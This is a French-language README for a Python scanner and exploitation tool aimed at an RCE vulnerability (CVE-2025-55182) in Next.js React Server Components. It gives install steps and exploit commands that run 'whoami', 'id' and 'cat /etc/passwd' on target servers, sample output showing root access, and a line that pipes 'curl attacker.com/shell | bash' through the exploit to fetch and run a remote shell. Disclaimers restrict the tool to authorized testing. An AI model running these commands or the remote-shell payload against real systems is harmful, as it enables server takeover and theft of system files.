
Un scanner de sécurité basé sur Python pour détecter et exploiter les vulnérabilités des **React Server Components (RSC)** dans les applications Next.js. Cet outil effectue une détection passive, un fingerprinting actif et des tests d'exploitation RCE.
Un scanner de sécurité basé sur Python pour détecter et exploiter les vulnérabilités des React Server Components (RSC) dans les applications Next.js. Cet outil effectue une détection passive, un fingerprinting actif et des tests d’exploitation RCE.
⚠️ AVERTISSEMENT : Cet outil est réservé aux tests de sécurité autorisés uniquement. L’accès non autorisé aux systèmes informatiques est illégal. Obtenez toujours une autorisation écrite avant de tester.
✅ Détection passive - Analyse le HTML, les en-têtes et la structure de la page pour les indicateurs RSC
✅ Fingerprinting actif - Envoie des en-têtes spécifiques RSC pour détecter les réponses du serveur
✅ Analyse des en-têtes HTTP - Identifie les en-têtes liés à Next.js et RSC
✅ Exploitation RCE - Exécute des commandes sur les serveurs vulnérables (si exploitable)
✅ Sortie terminal colorée - Retour visuel amélioré pour une meilleure lisibilité
✅ Mode interactif - Exécute plusieurs commandes en mode exploitation
✅ Décodage robuste - Gère les charges utiles compressées gzip et binaires
Cloner le dépôt
git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
cd CVE-2025-55182
Installer les dépendances
pip install -r requirements.txt
Paquets requis :
requests>=2.28.0 - Bibliothèque cliente HTTPurllib3>=1.26.0 - Utilitaires HTTP avancéscolorama>=0.4.6 - Couleurs du terminal (compatible Windows)beautifulsoup4 - Analyse HTMLpython rsc_detector.py https://example.com
python rsc_detector.py https://example.com --exploit
python rsc_detector.py https://example.com --exploit --cmd "whoami"
python rsc_detector.py https://example.com --exploit
Saisissez ensuite les commandes à l’invite (tapez quit pour quitter).
| Option | Description |
|---|---|
<URL> | URL cible (obligatoire). Préfixe automatiquement https:// si absent |
--exploit | Active l’exploitation RCE après la détection |
--cmd <commande> | Exécute une commande spécifique (à utiliser avec --exploit) |
Détecter une vulnérabilité RSC :
python rsc_detector.py https://target.com
Exploiter et exécuter la commande id :
python rsc_detector.py https://target.com --exploit --cmd "id"
Exploiter et exécuter cat /etc/passwd :
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
Mode interactif (plusieurs commandes) :
python rsc_detector.py https://target.com --exploit
window.__next_f (App Router Next.js)text/x-component__NEXT_DATA__ et les imports de Next.jsServer, Vary et X-Nextjs-CacheRSC: 1[*] Starting RSC Detection Scan on: https://example.com
====================================================================
[1] Running Passive Scan...
Status: DETECTED
Score: 80/100
- Found: window.__next_f (App Router)
[2] Analyzing Headers...
- Vary header includes RSC: ...
[3] Running Active Fingerprint...
Status: DETECTED
- Response Content-Type became text/x-component
- Vary header contains 'RSC'
====================================================================
[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
Consider: RCE exploitation may be possible
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root
CVE-2025-55182 exploite :
child_process.execSync()Cet outil est STRICTEMENT RÉSERVÉ AUX TESTS DE SÉCURITÉ AUTORISÉS :
L’accès non autorisé à un ordinateur est illégal en vertu de :
Si vous découvrez une vulnérabilité à l’aide de cet outil :
L’outil ignore la vérification SSL par défaut. Pour l’activer :
detector = RSCDetector(url, verify_ssl=True)
L’outil automatiquement :
Augmentez le délai d’attente dans le code :
response = self.session.get(self.url, timeout=30) # 30 secondes
CVE-2025-55182/
├── README.md # Ce fichier
├── requirements.txt # Dépendances Python
├── rsc_detector.py # Moteur principal de scan et d’exploitation
├── rsc_cli.py # Utilitaires CLI (si présent)
├── script.py # Scripts supplémentaires (si présent)
├── COLOR_GUIDE.md # Documentation de la sortie colorée
└── .gitignore # Règles Git ignore
requests>=2.28.0 # Requêtes HTTP
urllib3>=1.26.0 # HTTP avancé
beautifulsoup4>=4.11.0 # Analyse HTML
colorama>=0.4.6 # Couleurs du terminal (Windows)
Installez tout d’un coup :
pip install -r requirements.txt
--exploit si vous ne faites que scannerpython rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"
python rsc_detector.py https://target.com > scan_results.txt 2>&1
for url in https://site1.com https://site2.com; do
python rsc_detector.py "$url"
done
Vous avez trouvé un bug ou une amélioration ? Les contributions sont les bienvenues !
git checkout -b feature/amelioration)git commit -am 'Ajout d’une fonctionnalité')git push origin feature/amelioration)THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.
Ce projet est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
Créé pour la recherche en sécurité et les tests de pénétration autorisés.
Dernière mise à jour : 19 décembre 2025
Souvenez-vous : Un grand pouvoir implique de grandes responsabilités. Utilisez cet outil de manière éthique et légale.